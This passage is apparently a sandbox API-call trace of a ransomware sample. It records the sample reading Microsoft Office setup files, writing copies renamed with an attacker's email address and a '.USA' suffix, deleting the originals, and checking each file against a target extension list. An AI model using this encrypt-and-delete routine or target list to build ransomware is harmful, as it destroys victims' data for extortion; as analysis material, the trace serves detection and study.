controller\\office.en-us\\setup.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.416] GetLastError () returned 0x0 [0040.416] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x10676, lpOverlapped=0x0) returned 1 [0040.421] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x10680, lpOverlapped=0x0) returned 1 [0040.423] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.423] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.424] SetEndOfFile (hFile=0x1c8) returned 1 [0040.424] CloseHandle (hObject=0x1c8) returned 1 [0040.425] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.425] SetEndOfFile (hFile=0x1b8) returned 1 [0040.426] CloseHandle (hObject=0x1b8) returned 1 [0040.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.427] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 1 [0040.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.427] lstrlenW (lpString=".doc") returned 4 [0040.427] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.427] lstrlenW (lpString=".docx") returned 5 [0040.427] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0040.427] lstrlenW (lpString=".pdf") returned 4 [0040.427] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.427] lstrlenW (lpString=".xls") returned 4 [0040.427] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.427] lstrlenW (lpString=".xlsx") returned 5 [0040.427] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0040.427] lstrlenW (lpString=".ppt") returned 4 [0040.427] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.427] lstrlenW (lpString=".zip") returned 4 [0040.427] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.427] lstrlenW (lpString=".rar") returned 4 [0040.427] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.427] lstrlenW (lpString=".bz2") returned 4 [0040.427] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.427] lstrlenW (lpString=".7z") returned 3 [0040.427] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.427] lstrlenW (lpString=".dbf") returned 4 [0040.428] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.428] lstrlenW (lpString=".1cd") returned 4 [0040.428] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.428] lstrlenW (lpString=".jpg") returned 4 [0040.428] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.428] lstrlenW (lpString=".doc") returned 4 [0040.428] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString=".docx") returned 5 [0040.428] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0040.428] lstrlenW (lpString=".pdf") returned 4 [0040.428] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString=".xls") returned 4 [0040.428] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString=".xlsx") returned 5 [0040.428] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0040.428] lstrlenW (lpString=".ppt") returned 4 [0040.428] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.428] lstrlenW (lpString=".zip") returned 4 [0040.428] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString=".rar") returned 4 [0040.428] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString=".bz2") returned 4 [0040.428] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.428] lstrlenW (lpString=".7z") returned 3 [0040.428] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.428] lstrlenW (lpString=".dbf") returned 4 [0040.428] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.428] lstrlenW (lpString=".1cd") returned 4 [0040.428] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.429] lstrlenW (lpString=".jpg") returned 4 [0040.429] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.429] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.429] lstrlenW (lpString="SETUP.XML") returned 9 [0040.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.557] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2362) returned 1 [0040.557] CloseHandle (hObject=0x1b8) returned 1 [0040.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 0x20 [0040.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.558] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.558] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.558] GetLastError () returned 0x0 [0040.558] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x93a, lpOverlapped=0x0) returned 1 [0040.559] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x940, lpOverlapped=0x0) returned 1 [0040.560] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.560] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.560] SetEndOfFile (hFile=0x1c8) returned 1 [0040.561] CloseHandle (hObject=0x1c8) returned 1 [0040.561] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.561] SetEndOfFile (hFile=0x1b8) returned 1 [0040.562] CloseHandle (hObject=0x1b8) returned 1 [0040.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.562] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.563] lstrlenW (lpString=".doc") returned 4 [0040.563] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".docx") returned 5 [0040.563] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.563] lstrlenW (lpString=".pdf") returned 4 [0040.563] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".xls") returned 4 [0040.563] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".xlsx") returned 5 [0040.563] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.563] lstrlenW (lpString=".ppt") returned 4 [0040.563] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.563] lstrlenW (lpString=".zip") returned 4 [0040.563] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.563] lstrlenW (lpString=".rar") returned 4 [0040.563] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".bz2") returned 4 [0040.563] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".7z") returned 3 [0040.563] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.563] lstrlenW (lpString=".dbf") returned 4 [0040.563] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.563] lstrlenW (lpString=".1cd") returned 4 [0040.563] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.563] lstrlenW (lpString=".jpg") returned 4 [0040.563] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.564] lstrlenW (lpString=".doc") returned 4 [0040.564] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".docx") returned 5 [0040.564] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.564] lstrlenW (lpString=".pdf") returned 4 [0040.564] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".xls") returned 4 [0040.564] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".xlsx") returned 5 [0040.564] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.564] lstrlenW (lpString=".ppt") returned 4 [0040.564] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.564] lstrlenW (lpString=".zip") returned 4 [0040.564] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.564] lstrlenW (lpString=".rar") returned 4 [0040.564] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".bz2") returned 4 [0040.564] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".7z") returned 3 [0040.564] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.564] lstrlenW (lpString=".dbf") returned 4 [0040.564] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.564] lstrlenW (lpString=".1cd") returned 4 [0040.564] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.564] lstrlenW (lpString=".jpg") returned 4 [0040.564] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.564] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.565] lstrlenW (lpString="OutlookMUI.XML") returned 14 [0040.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.565] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3186) returned 1 [0040.565] CloseHandle (hObject=0x1b8) returned 1 [0040.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 0x20 [0040.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.565] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.565] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.567] GetLastError () returned 0x0 [0040.567] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xc72, lpOverlapped=0x0) returned 1 [0040.568] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xc80, lpOverlapped=0x0) returned 1 [0040.569] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.569] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.569] SetEndOfFile (hFile=0x1c8) returned 1 [0040.569] CloseHandle (hObject=0x1c8) returned 1 [0040.570] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.570] SetEndOfFile (hFile=0x1b8) returned 1 [0040.571] CloseHandle (hObject=0x1b8) returned 1 [0040.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.571] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 1 [0040.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.571] lstrlenW (lpString=".doc") returned 4 [0040.571] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.571] lstrlenW (lpString=".docx") returned 5 [0040.571] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.571] lstrlenW (lpString=".pdf") returned 4 [0040.571] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.571] lstrlenW (lpString=".xls") returned 4 [0040.572] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString=".xlsx") returned 5 [0040.572] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.572] lstrlenW (lpString=".ppt") returned 4 [0040.572] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.572] lstrlenW (lpString=".zip") returned 4 [0040.572] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.572] lstrlenW (lpString=".rar") returned 4 [0040.572] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString=".bz2") returned 4 [0040.572] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString=".7z") returned 3 [0040.572] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.572] lstrlenW (lpString=".dbf") returned 4 [0040.572] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.572] lstrlenW (lpString=".1cd") returned 4 [0040.572] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.572] lstrlenW (lpString=".jpg") returned 4 [0040.572] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.572] lstrlenW (lpString=".doc") returned 4 [0040.572] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString=".docx") returned 5 [0040.572] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.572] lstrlenW (lpString=".pdf") returned 4 [0040.572] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString=".xls") returned 4 [0040.572] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.572] lstrlenW (lpString=".xlsx") returned 5 [0040.572] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.572] lstrlenW (lpString=".ppt") returned 4 [0040.573] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.573] lstrlenW (lpString=".zip") returned 4 [0040.573] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.573] lstrlenW (lpString=".rar") returned 4 [0040.573] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.573] lstrlenW (lpString=".bz2") returned 4 [0040.573] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.573] lstrlenW (lpString=".7z") returned 3 [0040.573] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.573] lstrlenW (lpString=".dbf") returned 4 [0040.573] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.573] lstrlenW (lpString=".1cd") returned 4 [0040.573] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.573] lstrlenW (lpString=".jpg") returned 4 [0040.573] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.573] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.573] lstrlenW (lpString="SETUP.XML") returned 9 [0040.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.574] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=4207) returned 1 [0040.574] CloseHandle (hObject=0x1b8) returned 1 [0040.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common 